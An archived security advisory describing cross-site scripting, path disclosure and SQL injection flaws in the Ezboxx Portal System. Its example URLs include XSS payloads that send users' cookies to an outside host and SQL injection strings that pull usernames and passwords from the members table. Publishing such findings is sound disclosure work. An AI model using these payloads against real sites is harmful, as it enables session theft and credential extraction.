ezboxxezroot.txt

2007-01-14T00:00:00
ID PACKETSTORM:53627
Type packetstorm
Reporter Doron P
Modified 2007-01-14T00:00:00

Description

                                        
                                            `Ezboxx multiple vulnerabilities.  
  
Vulnerable version:  
Ezboxx Portal System Beta v 0.7.6 and below.  
The Ezboxx Portal System Beta v 0.7.6 and below versions are vulnerable to Cross-site scripting, Path disclosure and SQL Injection attacks.  
  
Cross-site scripting:  
----------------------  
Description:  
Input passed to the parameters "pic" (in "piczoom.asp"), "nocatname" (in "user-upload.asp") and "iid" (in "newscomments.asp")  
are not properly verified before being returned to the user as HTML code.   
Therefore an attacker may use one of the Cross-site scripting to execute arbitrary script code in the browser of the site's users.  
  
Proof-of-concept:  
http://[Host]/ezboxx/custom/piczoom.asp?pic=[XSS]  
http://[Host]/ezboxx/boxx/user-upload.asp?nocatname=[XSS] - Login required  
http://[Host]//ezboxx/indexes/newscomments.asp?iid=[XSS]  
  
Examples:  
http://[Host]/ezboxx/custom/piczoom.asp?pic=BugSec'+onerror='window.open("http://www.BugSec.com/Index.php?Security_Consulting_Company=Penetration-Testing&Cookie="+document.cookie)  
http://[Host]/ezboxx/boxx/user-upload.asp?nocatname='><script>location.href='http://www.BugSec.com/Index.php?Info-Sec=Pen_Test&Cookie='+document.cookie</script>  
http://[Host]/ezboxx/indexes/newscomments.asp?iid=200/*<script>location.href='http://www.BugSec.com/Index.php?Information-Security=Application_Security&Cookie='+document.cookie</script>*/  
  
  
Path disclosure:  
------------------  
Description:  
Path information can be disclosed in error pages by passing invalid input to the parameter "cat" in "knowledgebase.asp".  
  
Proof-of-concept:  
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=notnumber  
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=1&Cat=notnumber  
  
Examples:  
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=exam  
http://[Host]/ezboxx/boxx/knowledgebase.asp?Type=1&Cat=exam  
  
  
SQL Injection:  
-------------------  
Description:  
Input passed to the "iid" parameter in "ShowAppendix.asp" isn't properly verified before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.  
An attacker may use this vulnerability to extract any info (like account's passwords) from the database.  
  
Proof-of-concept:  
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=[SQL]  
  
Example:  
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+username+from+members))  
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+password+from+members))  
  
  
Credit:  
Doron P and Eyal G from BugSec  
Tel:+97239622655  
Fax:+97239619351  
Email:Info [^A-t] BugSec \*D.O.T*\ com  
BugSec LTD. - www.BugSec.com  
Security Consulting Company  
`